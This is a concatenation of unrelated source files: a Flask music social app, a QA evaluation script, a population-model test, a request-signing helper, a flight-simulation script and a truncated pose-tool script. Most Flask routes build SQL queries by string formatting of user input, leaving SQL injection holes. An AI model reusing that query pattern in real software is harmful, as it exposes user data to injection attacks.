@app.route('/user/<userid>/file', methods=['GET', 'POST'])
def upload_file(userid):
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
filepath = UPLOAD_FOLDER + filename
session['profilepic'] = filepath
g.database.execute("""UPDATE MuShMe.entries SET Profile_pic="%s" WHERE User_id="%s" """ % (filepath, userid))
g.conn.commit()
return redirect(url_for('userProfile', userid=userid))
app.add_url_rule('/user/uploads/<filename>', 'uploaded_file',build_only=True)
app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {'/user/uploads': 'src/static' + app.config['UPLOAD_FOLDER'] })
@app.route('/user/<rcvrid>.<senderid>/comment',methods=['POST','GET'])
def comment(rcvrid, senderid):
if request.method == 'POST':
commentform = CommentForm(request.form, prefix='form4')
#print senderid
#print rcvrid
if commentform.comment.data:
query = ("""INSERT INTO MuShMe.comments (comment_type, Comment, User_id) VALUES ("%s","%s","%s") """ % ('U',commentform.comment.data, senderid))
print query
g.database.execute(query)
g.conn.commit()
g.database.execute("""SELECT Comment_id from MuShMe.comments WHERE Comment="%s" """ % (commentform.comment.data))
data = g.database.fetchone()[0]
#print data
enter_comment = g.database.execute("""INSERT INTO MuShMe.user_comments (Comment_id, User_id) VALUES ("%s","%s")""" % (data,rcvrid))
if enter_comment:
g.conn.commit()
g.database.execute("""SELECT User_id FROM MuShMe.user_comments WHERE Comment_id="%s" """ % data)
#print g.database.fetchone()[0]
return redirect(url_for('userProfile', userid=rcvrid))
@app.route('/user/<userid>/<commentid>/report',methods=['POST','GET'])
def report(userid,commentid):
if request.method == 'POST':
reportform = ReportForm(request.form, prefix='form5')
print reportform.report.data
check_report = g.database.execute("""INSERT INTO MuShMe.complaints (Complain_type, Complain_description, Comment_id,reported_by) VALUES ("%s","%s","%s","%s") """ % (reportform.report.data, reportform.other.data, commentid, session['userid'] ))
if check_report == True:
g.conn.commit()
return redirect(url_for('userProfile', userid=userid))
else:
return redirect(url_for('userProfile', userid=userid))
@app.route('/user/<uidto>.<uidfrom>/request',methods=['POST'])
def sendrequest(uidto,uidfrom):
if request.method == 'POST':
if requestvalidate(uidfrom,uidto):
query=(""" INSERT INTO requests (Request_from,Request_to,Status) VALUES ("%s","%s","%s") """ % (uidfrom,uidto,1))
g.database.execute(query)
g.conn.commit()
return redirect(url_for('userProfile', userid=uidto))
@app.route('/user/<userto>.<userfrom>/accept',methods=['POST'])
def acceptrequest(userto,userfrom):
if request.method == 'POST':
query=(""" UPDATE requests SET Status="%s" WHERE Request_from="%s" and Request_to="%s" """ % (0,userfrom,userto))
g.database.execute(query)
g.conn.commit()
query = (""" INSERT INTO friends Values ("%s","%s") """ % (userfrom,userto))
g.database.execute(query)
g.conn.commit()
return redirect(url_for('userProfile', userid=userto))
@app.route('/user/<userto>.<userfrom>/reject',methods=['POST'])
def rejectrequest(userto,userfrom):
if request.method == 'POST':
query=(""" UPDATE requests SET Status="%s" WHERE Request_from="%s" and Request_to="%s" """ % (-1,userfrom,userto))
g.database.execute(query)
g.conn.commit()
return redirect(url_for('userProfile', userid=userto))
def requestvalidate(userfrom,userto):
check = g.database.execute(""" SELECT Status from requests where Request_to="%s" and Request_from="%s" """ % (userfrom,userto))
if check and g.database.fetchone()[0]=='-1' and userfrom!=userto:
return False
else:
return True
@app.route('/search',methods=['POST','GET'])
def search():
if request.method == 'POST':
searchform = searchForm(prefix='form6')
#print 'f'
value = searchform.entry.data + '%'
search_fname = []
search_song= []
search_friend = []
search_playlist =[]
search_artist = []
check_song = g.database.execute("""SELECT Song_title,Song_Album,Genre,Publisher,Song_id from MuShMe.songs WHERE Song_title LIKE "%s" """ % ( value ))
for a in g.database.fetchall():
data={}
data['title']=a[0]
data['album']=a[1]
data['genre']=a[2]
data['publisher']=a[3]
data['songid']=a[4]
data['art']=getSongArt(a[4])
search_song.append(data)
check_artist = g.database.execute("""SELECT Artist_name, Artist_id from MuShMe.artists WHERE Artist_name LIKE "%s" """ % ( value ))
for a in g.database.fetchall():
data = {}
data['artistname']=a[0]
data['artistid']=a[1]
search_artist.append(data)
check_friend = g.database.execute("""SELECT Username, Name, Profile_pic, User_id from MuShMe.entries WHERE Username LIKE "%s" or Name LIKE "%s" """ % ( value, value ))
for a in g.database.fetchall():
data = {}
data['username']=a[0]
data['name']=a[1]
data['profilepic']=a[2]
data['userid']=a[3]
search_friend.append(data)
check_playlist = g.database.execute("""SELECT Playlist_name,User_id, Playlist_id from MuShMe.playlists WHERE Playlist_name LIKE "%s" """ % ( value ))
for a in g.database.fetchall():
data = {}
data['pname']=a[0]
data['pid']=a[2]
g.database.execute(""" SELECT Username, Name from MuShMe.entries WHERE User_id="%s" """ % a[1])
for k in g.database.fetchall():
data['username']=k[0]
data['uname']=k[1]
search_playlist.append(data)
length = len(search_playlist) + len(search_song) + len(search_friend) + len(search_artist) + len(search_fname)
return render_template('searchpage/search.html', entry=searchform.entry.data,form6=searchForm(prefix='form6'),
search_song=search_song, search_artist=search_artist,friends=search_friend,
search_playlist=search_playlist,length = length)
else:
return render_template('searchpage/search.html',form6=searchForm(prefix='form6'))
@app.route('/user/<userid>/addplaylist',methods=['POST'])
def addplaylist(userid):
if request.method=='POST':
addplaylistform = AddPlaylist(prefix='form7')
g.database.execute("""INSERT INTO MuShMe.playlists (Playlist_name, User_id) VALUES ("%s","%s")""" % (addplaylistform.add.data,userid))
g.conn.commit()
return redirect(url_for('userProfile',userid=userid))
@app.route("/playlist/<userid>/deleteplaylist", methods=["POST"])
def deleteplaylist(userid):
playlist = request.form.getlist('playlistselect')
for playlistid in playlist:
g.database.execute("""DELETE FROM playlists WHERE Playlist_id=%s and User_id=%s """ %
(playlistid, userid))
g.conn.commit()
return redirect(url_for('userProfile',userid=userid))
#All your profile are belong to us.
@app.route('/artist/<artistid>')
def artistProfile(artistid):
return render_template('artistpage/index.html',form6=searchForm(prefix='form6'))
#To handle 404 not found errors
@app.errorhandler(404)
def page_not_found_error(error):
return render_template('error.html'), 404
@app.route('/termsofservices')
def tos():
return render_template('tos.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/changepwd')
def changepwd():
return render_template('changepwd.html')
@app.route('/logout')
def logout():
if 'email' not in session:
return render_template('error.html')
session['logged_in']=False
return render_template('login.html')
if not app.debug:
import logging
from logging.handlers import SMTPHandler
mail_handler = SMTPHandler('127.0.0.1', '<EMAIL>', app.config['DEFAULT_MAIL_SENDER'], 'YourApplication Failed')
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
from logging import FileHandler
file_handler = FileHandler('log.txt')
file_handler.setLevel(logging.WARNING)
app.logger.addHandler(file_handler)
from logging import Formatter
mail_handler.setFormatter(Formatter('''
Message type: %(levelname)s
Location: %(pathname)s:%(lineno)d
Module: %(module)s
Function: %(funcName)s
Time: %(asctime)s
Message:
%(message)s
'''))
if __name__ == """__main__""":
# To allow aptana to receive errors, set use_debugger=False
app = create_app(config="""config.yaml""")
if app.debug: use_debugger = True
try:
# Disable Flask's debugger if external debugger is requested
use_debugger = not(app.config.get('DEBUG_WITH_APTANA'))
except:
pass
app.run(use_debugger=use_debugger,
use_reloader=use_debugger, threaded=True, port=8080)
| 1.921875 | 2 |
language/labs/drkit/evaluate.py | Xtuden-com/language | 1,199 | 3441 | <gh_stars>1000+
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Evaluate lazy slot filling results."""
import codecs
import collections
import gzip
import json
import random
import re
import string
import unicodedata
from absl import app
from absl import flags
from bert import tokenization
from language.labs.drkit import input_fns
import numpy as np
import tensorflow.compat.v1 as tf
PUNCTUATION = frozenset(string.punctuation)
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string("ground_truth_file", None,
"File with ground truth answers.")
flags.DEFINE_string("predicted_answers_file", None,
"File with predicted answers from model.")
flags.DEFINE_string("relation_counts_file", None,
"JSON file with relation counts.")
class NumpyEncoder(json.JSONEncoder):
"""Special json encoder for numpy types."""
def default(self, obj):
if isinstance(obj, (np.int_, np.intc, np.intp, np.int8, np.int16, np.int32,
np.int64, np.uint8, np.uint16, np.uint32, np.uint64)):
return int(obj)
elif isinstance(obj, (np.float_, np.float16, np.float32, np.float64)):
return float(obj)
    elif isinstance(obj, (np.ndarray,)):  # convert numpy arrays to plain lists so json can serialize them
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def wikimovie_eval_fn(dataset, results, name_map, output_prediction_file,
**kwargs):
"""Compute evaluation metrics for OneHopDataset or TwoHopDataset.
Args:
dataset: An object of type OneHopDataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples}
gt_ques = {ex.qas_id: ex.question_text for ex in dataset.examples}
gt_entity = {ex.qas_id: ex.subject_entity[0] for ex in dataset.examples}
inf_chain = {ex.qas_id: ex.inference_chain for ex in dataset.examples}
# Compute basic metrics.
num_correct = 0.
all_predictions = {}
chain2stats = {ch: [0., 0.] for ch in inf_chain.values()}
incorrect_results, correct_results = [], []
for result in results:
qas_id = result["qas_ids"]
prediction = result["predictions"]
if prediction in gt_answer[qas_id]:
num_correct += 1
chain2stats[inf_chain[qas_id]][0] += 1
correct_results.append({
"qas_id": result["qas_ids"],
"question": gt_ques[qas_id],
"answers": gt_answer[qas_id],
"subject": gt_entity[qas_id],
"inf-chain": inf_chain[qas_id],
"predictions": result["predictions"],
})
for hop in range(3):
if "sparse_%d" % hop in result:
correct_results[-1].update({
"sparse_%d" % hop: result["sparse_%d" % hop],
"dense_%d" % hop: result["dense_%d" % hop],
"mention_%d" % hop: result["mention_%d" % hop],
"entity_%d" % hop: result["entity_%d" % hop],
"sparse_scores_%d" % hop: result["sparse_scores_%d" % hop],
"dense_scores_%d" % hop: result["dense_scores_%d" % hop],
"mention_scores_%d" % hop: result["mention_scores_%d" % hop],
"entity_scores_%d" % hop: result["entity_scores_%d" % hop],
})
else:
incorrect_results.append({
"qas_id": result["qas_ids"],
"question": gt_ques[qas_id],
"answers": gt_answer[qas_id],
"subject": gt_entity[qas_id],
"inf-chain": inf_chain[qas_id],
"predictions": result["predictions"],
})
for hop in range(3):
if "sparse_%d" % hop in result:
incorrect_results[-1].update({
"sparse_%d" % hop: result["sparse_%d" % hop],
"dense_%d" % hop: result["dense_%d" % hop],
"mention_%d" % hop: result["mention_%d" % hop],
"entity_%d" % hop: result["entity_%d" % hop],
"sparse_scores_%d" % hop: result["sparse_scores_%d" % hop],
"dense_scores_%d" % hop: result["dense_scores_%d" % hop],
"mention_scores_%d" % hop: result["mention_scores_%d" % hop],
"entity_scores_%d" % hop: result["entity_scores_%d" % hop],
})
chain2stats[inf_chain[qas_id]][1] += 1
all_predictions[qas_id] = name_map[str(prediction)]
accuracy = num_correct / len(all_predictions)
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
json.dump(
random.sample(incorrect_results, 100),
tf.gfile.Open(output_prediction_file + ".incorrect", "w"),
cls=NumpyEncoder)
json.dump(
random.sample(correct_results, 100),
tf.gfile.Open(output_prediction_file + ".correct", "w"),
cls=NumpyEncoder)
# Return metrics.
metrics = {
"accuracy": accuracy,
}
for ch, stats in chain2stats.items():
metrics["inference-chains-acc/" + ch] = stats[0] / stats[1]
return metrics
def multihop_eval_fn(dataset,
results,
name_map,
output_prediction_file,
supervision="mention",
**kwargs):
"""Compute evaluation metrics for OneHopDataset or TwoHopDataset.
Args:
dataset: An object of type OneHopDataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
supervision: Type of supervision used in the model.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_mentions = {ex.qas_id: ex.answer_mention[0] for ex in dataset.examples}
if supervision == "mention":
gt_answer = gt_mentions
else:
gt_answer = {ex.qas_id: ex.answer_entity[0] for ex in dataset.examples}
# Compute basic metrics.
num_correct = 0.
all_predictions = {}
for result in results:
qas_id = result["qas_ids"]
prediction = result["predictions"]
if prediction == gt_answer[qas_id]:
num_correct += 1
all_predictions[qas_id] = name_map[str(prediction)]
accuracy = num_correct / len(all_predictions)
# Compute advanced metrics.
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
micro, macro, _, _ = compute_scores(dataset.gt_file, output_prediction_file)
# Return metrics.
metrics = {
"accuracy": accuracy,
"micro-p": micro[0],
"micro-r": micro[1],
"micro-f": micro[2],
"macro-p": macro[0],
"macro-r": macro[1],
"macro-f": macro[2],
}
return metrics
def hotpot_eval_fn(dataset, results, name_map, output_prediction_file,
**kwargs):
"""Compute evaluation metrics for HotpotQADataset.
Args:
dataset: An object of type HotpotQADataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples}
gt_types = {ex.qas_id: ex.inference_chain for ex in dataset.examples}
# Compute basic metrics.
num_correct = {2: 0., 5: 0., 10: 0., 20: 0.}
aps = []
no_answer = 0.
all_predictions = {}
bridge_acc, comp_acc = 0., 0.
bridge_tot, comp_tot = 0, 0
single_acc = 0.
layer_weights = np.zeros_like(results[0]["layer_probs"])
num_layer_entities = {i: 0. for i in range(layer_weights.shape[0])}
num_new_entities = {i: 0. for i in range(layer_weights.shape[0])}
for result in results:
qas_id = result["qas_ids"].decode("utf-8")
preds = result["top_idx"]
scores = result["top_vals"]
ans = gt_answer[qas_id]
my_type = gt_types[qas_id]
if my_type == "bridge":
bridge_tot += 1
else:
comp_tot += 1
ranks = np.where(np.in1d(preds, ans))[0]
ranks = np.sort(ranks)
ap = 0.
cnt = 0.
if any(rr < 10 for rr in ranks):
single_acc += 1
if ranks.shape[0] == 0:
no_answer += 1
for rr in ranks:
cnt += 1
ap += cnt / (rr + 1)
if ans:
aps.append(ap / len(ans))
else:
aps.append(0.)
found = False
for key in [2, 5, 10, 20]:
if found or np.in1d(ans, preds[:key]).all():
num_correct[key] += 1
found = True
if key == 10:
if my_type == "bridge":
bridge_acc += 1
else:
comp_acc += 1
# Non-accuracy stats
layer_weights += result["layer_probs"]
layer_entities = {i: set() for i in range(layer_weights.shape[0])}
all_predictions[qas_id] = {}
for i in range(layer_weights.shape[0]):
layer_entities[i] = set(
[ee for ee in result["layer_%d_ent" % i] if ee != -1])
num_layer_entities[i] += len(layer_entities[i])
num_new_entities[i] += len(layer_entities[i] - layer_entities[0])
# all_predictions[qas_id]["layer_%d" % i] = [
# name_map[str(ee)] for ee in layer_entities[i]]
all_predictions[qas_id]["predictions"] = [
(name_map[str(pred)], str(scores[i])) for i, pred in enumerate(preds)
]
tf.logging.info("Evaluated %d items", len(all_predictions))
accuracy = {
key: (num_correct[key] / len(all_predictions)) for key in num_correct
}
# Compute advanced metrics.
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
# Return metrics.
metrics = {"eval/@%d" % key: accuracy[key] for key in accuracy}
metrics["accuracy"] = accuracy[10]
metrics["eval/map"] = sum(aps) / len(all_predictions)
metrics["eval/bridge_accuracy"] = bridge_acc / bridge_tot
metrics["eval/comparison_accuracy"] = comp_acc / comp_tot
metrics["analysis/single_accuracy"] = single_acc / len(all_predictions)
metrics["analysis/no_answers"] = no_answer / len(all_predictions)
for i in range(layer_weights.shape[0]):
metrics["analysis/layer_weight_%d" %
i] = layer_weights[i] / len(all_predictions)
metrics["analysis/num_entities_%d" %
i] = num_layer_entities[i] / len(all_predictions)
metrics["analysis/num_new_entities_%d" %
i] = num_new_entities[i] / len(all_predictions)
return metrics
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(prediction, ground_truth):
"""Compute F1 score."""
prediction_tokens = normalize_answer(prediction).split()
ground_truth_tokens = normalize_answer(ground_truth).split()
common = collections.Counter(prediction_tokens) & collections.Counter(
ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
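# Illustrative example (added; not part of the original module): with
# prediction "the cat sat" and ground truth "cat sat down", normalization
# drops the article "the", leaving a token overlap of {"cat", "sat"}, so
# precision = 1.0, recall = 2/3 and F1 = 0.8.
#   >>> round(f1_score("the cat sat", "cat sat down"), 2)
#   0.8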
def exact_match_score(prediction, ground_truth):
"""Compute EM score."""
return normalize_answer(prediction) == normalize_answer(ground_truth)
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
scores_for_ground_truths = []
for ground_truth in ground_truths:
my_score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(my_score)
return max(scores_for_ground_truths)
def read_predictions(prediction_file):
with tf.gfile.Open(prediction_file) as f:
predictions = json.load(f)
return predictions
def read_answers(gold_file):
"""Read ground truth answers."""
answers = {}
f = tf.gfile.Open(gold_file)
if gold_file.endswith(".gz"):
f = gzip.GzipFile(fileobj=f)
for i, line in enumerate(f):
example = json.loads(line)
if i == 0 and "header" in example:
continue
for qa in example["qas"]:
answers[qa["qid"]] = qa["answers"]
f.close()
return answers
def evaluate(answers, predictions, skip_no_answer=False):
"""Compute F1 and EM scores."""
f1 = exact_match = total = 0
for qid, ground_truths in answers.items():
if qid not in predictions:
if not skip_no_answer:
message = "Unanswered question %s will receive score 0." % qid
print(message)
total += 1
continue
total += 1
prediction = predictions[qid]
exact_match += metric_max_over_ground_truths(exact_match_score, prediction,
ground_truths)
f1 += metric_max_over_ground_truths(f1_score, prediction, ground_truths)
exact_match = 100.0 * exact_match / total
f1 = 100.0 * f1 / total
return {"exact_match": exact_match, "f1": f1}
def mrqa_eval_fn(dataset_file, predictions_file, skip_no_answer=True):
answers = read_answers(dataset_file)
predictions = read_predictions(predictions_file)
return evaluate(answers, predictions, skip_no_answer)
def compute_scores(ground_truth_file, predicted_answers_file):
"""Read predictions and ground truth and return P, R, F."""
telemetry, incorrect = read_results(ground_truth_file, predicted_answers_file)
micro = aprf(telemetry)
relationwise = aprf_relationwise(telemetry)
macro = sum([val[0] for _, val in relationwise.items()])
macro = macro / len(relationwise)
return micro, macro, relationwise, incorrect
def read_results(ground_truth_file, predicted_answers_file):
"""Read results and ground truth and return data structure with stats."""
with codecs.getreader("utf-8")(tf.gfile.GFile(ground_truth_file,
"r")) as read:
data_ = {}
for line in read:
item = json.loads(line.strip())
if isinstance(item["relation"], dict):
relation = item["relation"]["wikidata_id"]
elif isinstance(item["relation"], list):
relation = (
item["relation"][0]["wikidata_id"] + "_" +
item["relation"][1]["wikidata_id"])
data_[item["id"]] = [relation, item["subject"]["wikidata_id"]]
if "is_impossible" in item and item["is_impossible"]:
continue
if item["object"] is None:
continue
if isinstance(item["object"]["mention"], dict):
data_[item["id"]] += [item["object"]["mention"]["text"]]
if "name" in item["object"]:
data_[item["id"]] += [item["object"]["name"]]
if "aliases" in item["object"]:
data_[item["id"]] += item["object"]["aliases"].keys()
with codecs.getreader("utf-8")(tf.gfile.GFile(predicted_answers_file,
"r")) as fin:
predictions = json.load(fin)
telemetry, incorrect = [], []
n = 0
for key in data_:
if key not in predictions:
continue
g = data_[key][2:]
a = predictions[key]
m = data_[key][:2]
stats = score(g, a)
telemetry.append([m[0], m[1], g, a, stats])
if stats[0] == 0. and stats[3] > 0.:
incorrect.append(key)
n += 1
return telemetry, incorrect
def aprf_relationwise(g):
"""Returns precision, recall and F score for each relation."""
rel_to_stats = collections.defaultdict(list)
for item in g:
rel_to_stats[item[0]].append(item)
rel_to_scores = {}
for rel, stats in rel_to_stats.items():
rel_to_scores[rel] = [aprf(stats), len(stats)]
return rel_to_scores
def aprf(g):
"""Returns precision, recall and F of the given statistics."""
tp, _, sys_pos, real_pos = sum([x[-1] for x in g])
if tp == 0:
p = r = f = 0.0
else:
p = tp / float(sys_pos) if sys_pos > 0 else 0.
r = tp / float(real_pos) if real_pos > 0 else 0.
f = 2 * p * r / (p + r)
return np.asarray([p, r, f])
def score(gold, answer):
"""Compares answer to ground truth to return TP / FP stats."""
if gold:
gold = set([simplify(g) for g in gold])
answer = simplify(answer)
result = np.zeros(4)
if gold:
result[3] += 1
if answer in gold:
result[0] += 1
else:
if not answer:
result[1] += 1
if answer:
result[2] += 1
return result
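# Illustrative note (added): score() packs its counts as a length-4 vector
# [true positive, correctly-empty answer, system answered, gold exists],
# which aprf() later sums across examples to derive precision and recall.
#   >>> score(["Barack Obama"], "barack obama")
#   array([1., 0., 1., 1.])
#   >>> score([], "")
#   array([0., 1., 0., 0.])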
def strip_accents_and_punct(text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
if char in PUNCTUATION:
continue
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def simplify(answer):
"""Pre-process answer string."""
toks = []
articles = {"the", "a", "an", "and", ""}
for t in answer.strip().lower().split():
tok = strip_accents_and_punct(t)
if tok not in articles:
toks.append(tok)
return "".join(toks)
def rare_relation_scores(relationwise, relation2counts):
"""Print statistics of rare relations for different thresholds."""
for thresh in [5, 100, 500, 1000]:
freq_stats, freq_total = np.array([0., 0., 0.]), 0
rare_stats, rare_total = np.array([0., 0., 0.]), 0
for relation, (stats, _) in relationwise.items():
if relation2counts.get(relation, 0) < thresh:
rare_stats += stats
rare_total += 1
else:
freq_stats += stats
freq_total += 1
rare_stats /= rare_total
freq_stats /= freq_total
print(
"Threshold =", thresh, "rare", rare_total,
"Micro-P %.3f Micro-R %.3f Micro-F %.3f" %
(rare_stats[0], rare_stats[1], rare_stats[2]), "freq", freq_total,
"Micro-P %.3f Micro-R %.3f Micro-F %.3f" %
(freq_stats[0], freq_stats[1], freq_stats[2]))
def main(_):
eval_type = "hotpot"
if eval_type == "hotpot":
test_hotpot_eval()
else:
micro, macro, rwise, _ = compute_scores(FLAGS.ground_truth_file,
FLAGS.predicted_answers_file)
print("Micro", micro)
print("Macro", macro)
if FLAGS.relation_counts_file is not None:
r2c = json.load(tf.gfile.Open(FLAGS.relation_counts_file))
rare_relation_scores(rwise, r2c)
if __name__ == "__main__":
app.run(main)
| 1.898438 | 2 |
tests/adv/test_pop_sfrd.py | jlashner/ares | 10 | 3442 | """
test_pop_models.py
Author: <NAME>
Affiliation: UCLA
Created on: Fri Jul 15 15:23:11 PDT 2016
Description:
"""
import ares
import matplotlib.pyplot as pl
PB = ares.util.ParameterBundle
def test():
# Create a simple population
pars_1 = PB('pop:fcoll') + PB('sed:bpass')
pop_fcoll = ares.populations.GalaxyPopulation(**pars_1)
#pop_fcoll_XR = ares.populations.GalaxyPopulation(**pars_1)
# Mimic the above population to check our different SFRD/SED techniques
sfrd_pars = {'pop_sfr_model': 'sfrd-func'}
sfrd_pars['pop_sfrd'] = pop_fcoll.SFRD
sfrd_pars['pop_sfrd_units'] = 'internal'
sed = PB('sed:toy')
sed['pop_Nion'] = pop_fcoll.src.Nion
sed['pop_Nlw'] = pop_fcoll.src.Nlw
# pop_Ex?
sed['pop_ion_src_igm'] = False
sed['pop_heat_src_igm'] = False
pars_2 = sed + sfrd_pars
pop_sfrd = ares.populations.GalaxyPopulation(**pars_2)
assert pop_fcoll.SFRD(20.) == pop_sfrd.SFRD(20.), "Error in SFRD."
# Check the emissivities too
#print(pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#print(pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#assert pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6) \
# == pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6), \
# "Error in photon luminosity density."
if __name__ == '__main__':
test()
| 1.890625 | 2 |
venv/lib/python3.7/site-packages/leancloud/engine/utils.py | corgiclub/CorgiBot_telegram | 0 | 3443 | # coding: utf-8
import time
import hashlib
import leancloud
from leancloud._compat import to_bytes
__author__ = 'asaka <<EMAIL>>'
def sign_by_key(timestamp, key):
return hashlib.md5(to_bytes('{0}{1}'.format(timestamp, key))).hexdigest()
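# Illustrative usage (added; the exact header format below is an assumption,
# not taken from this module): a request is typically signed by hashing a
# millisecond timestamp concatenated with the application key.
#   >>> ts = str(int(time.time() * 1000))
#   >>> sign = sign_by_key(ts, 'my-app-key')     # md5 hex digest of ts + key
#   >>> header = '{0},{1}'.format(sign, ts)      # e.g. an X-LC-Sign-style value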
| 1.984375 | 2 |
AirplaneLQR/chap4LQR/mavsim_chap4.py | eyler94/ee674AirplaneSim | 1 | 3444 | <filename>AirplaneLQR/chap4LQR/mavsim_chap4.py<gh_stars>1-10
"""
mavsimPy
- Chapter 4 assignment for <NAME>, PUP, 2012
- Update history:
12/27/2018 - RWB
1/17/2019 - RWB
"""
import sys
sys.path.append('..')
import numpy as np
import parameters.simulation_parameters as SIM
from chap2.mav_viewer import mav_viewer
# from chap2.video_writer import video_writer
from chap3.data_viewer import data_viewer
from chap4.mav_dynamics import mav_dynamics
from chap4.wind_simulation import wind_simulation
from time import sleep
# initialize the visualization
VIDEO = False # True==write video, False==don't write video
mav_view = mav_viewer() # initialize the mav viewer
data_view = data_viewer() # initialize view of data plots
if VIDEO == True:
video = video_writer(video_name="chap4_video.avi",
bounding_box=(0, 0, 1000, 1000),
output_rate=SIM.ts_video)
# initialize elements of the architecture
wind = wind_simulation(SIM.ts_simulation)
mav = mav_dynamics(SIM.ts_simulation)
# initialize the simulation time
sim_time = SIM.start_time
# main simulation loop
# sleep(5)
print("Press Command-Q to exit...")
while sim_time < SIM.end_time:
#-------set control surfaces-------------
if(sim_time<25):
delta_e = -0.1
delta_t = 1.0 # 0.5
delta_a = 0.0 # 0.0
delta_r = 0.0 # 0.005
delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector
else:
delta_e = -0.3
delta_t = 1.0#0.5
delta_a = 0.01#0.0
delta_r = 0.00025#0.005
delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector
#-------physical system-------------
current_wind = wind.update() # get the new wind vector
# print("current wind: ", current_wind)
mav.update_state(delta, current_wind) # propagate the MAV dynamics
#-------update viewer-------------
mav_view.update(mav.msg_true_state) # plot body of MAV
data_view.update(mav.msg_true_state, # true states
mav.msg_true_state, # estimated states
mav.msg_true_state, # commanded states
SIM.ts_simulation)
if VIDEO == True:
video.update(sim_time)
#-------increment time-------------
sim_time += SIM.ts_simulation
if VIDEO == True:
video.close()
| 2.53125 | 3 |
core/self6dpp/tools/ycbv/ycbv_pbr_so_mlBCE_Double_3_merge_train_real_uw_init_results_with_refined_poses_to_json.py | THU-DA-6D-Pose-Group/self6dpp | 33 | 3445 | <gh_stars>10-100
import os.path as osp
import sys
import numpy as np
import mmcv
from tqdm import tqdm
from functools import cmp_to_key
cur_dir = osp.dirname(osp.abspath(__file__))
PROJ_ROOT = osp.normpath(osp.join(cur_dir, "../../../../"))
sys.path.insert(0, PROJ_ROOT)
from lib.pysixd import inout, misc
from lib.utils.bbox_utils import xyxy_to_xywh
from lib.utils.utils import iprint, wprint
id2obj = {
1: "002_master_chef_can", # [1.3360, -0.5000, 3.5105]
2: "003_cracker_box", # [0.5575, 1.7005, 4.8050]
3: "004_sugar_box", # [-0.9520, 1.4670, 4.3645]
4: "005_tomato_soup_can", # [-0.0240, -1.5270, 8.4035]
5: "006_mustard_bottle", # [1.2995, 2.4870, -11.8290]
6: "007_tuna_fish_can", # [-0.1565, 0.1150, 4.2625]
7: "008_pudding_box", # [1.1645, -4.2015, 3.1190]
8: "009_gelatin_box", # [1.4460, -0.5915, 3.6085]
9: "010_potted_meat_can", # [2.4195, 0.3075, 8.0715]
10: "011_banana", # [-18.6730, 12.1915, -1.4635]
11: "019_pitcher_base", # [5.3370, 5.8855, 25.6115]
12: "021_bleach_cleanser", # [4.9290, -2.4800, -13.2920]
13: "024_bowl", # [-0.2270, 0.7950, -2.9675]
14: "025_mug", # [-8.4675, -0.6995, -1.6145]
15: "035_power_drill", # [9.0710, 20.9360, -2.1190]
16: "036_wood_block", # [1.4265, -2.5305, 17.1890]
17: "037_scissors", # [7.0535, -28.1320, 0.0420]
18: "040_large_marker", # [0.0460, -2.1040, 0.3500]
19: "051_large_clamp", # [10.5180, -1.9640, -0.4745]
20: "052_extra_large_clamp", # [-0.3950, -10.4130, 0.1620]
21: "061_foam_brick", # [-0.0805, 0.0805, -8.2435]
}
obj_num = len(id2obj)
obj2id = {_name: _id for _id, _name in id2obj.items()}
if __name__ == "__main__":
new_res_path = osp.join(
PROJ_ROOT,
"datasets/BOP_DATASETS/ycbv/test/init_poses/",
